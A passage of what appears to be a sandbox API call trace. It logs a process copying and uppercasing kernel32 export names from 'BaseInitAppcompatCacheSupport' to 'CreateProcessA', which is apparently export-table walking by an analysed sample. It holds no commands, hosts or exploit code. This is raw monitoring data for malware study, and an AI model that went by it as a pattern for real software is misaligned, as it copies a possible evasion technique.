lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.192] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.192] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.193] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.193] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.193] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.193] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.193] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.193] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.193] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.193] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.193] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.193] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.193] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.193] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.193] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.193] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.193] lstrlenA (lpString="BEEP") returned 4 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.193] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.193] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.193] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.193] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.194] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.194] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.194] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.194] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.194] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.194] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.194] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.194] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.194] lstrlenA (lpString="CANCELIO") returned 8 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.194] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.194] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.194] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.194] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.194] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.194] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.194] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.194] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.194] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.194] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.195] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.195] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.195] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.195] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.195] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.195] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.195] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.195] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.195] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.195] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.195] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.195] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.195] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.195] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.195] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.195] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.195] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.195] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.195] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.196] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.196] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.196] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.196] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.196] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.196] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.196] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.196] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.196] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.196] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.196] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.196] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.196] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.196] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.196] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.196] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.196] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.196] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.196] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.197] lstrlenA (lpString="COPYFILEA") returned 9 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.197] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.197] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.197] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.197] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.197] lstrlenA (lpString="COPYFILEW") returned 9 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.197] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.197] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.197] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.197] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.197] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.197] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.197] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.197] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.197] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.197] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.197] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.197] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.197] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.197] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.198] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.198] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.198] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.198] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.198] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.198] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.198] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.198] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.198] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.198] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.198] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.198] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.198] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.198] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.198] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.198] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.198] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.198] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.198] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.198] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.199] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.199] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.199] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.199] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.199] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.199] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.199] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.199] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.199] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.199] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.199] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.199] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.199] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.199] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.199] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: 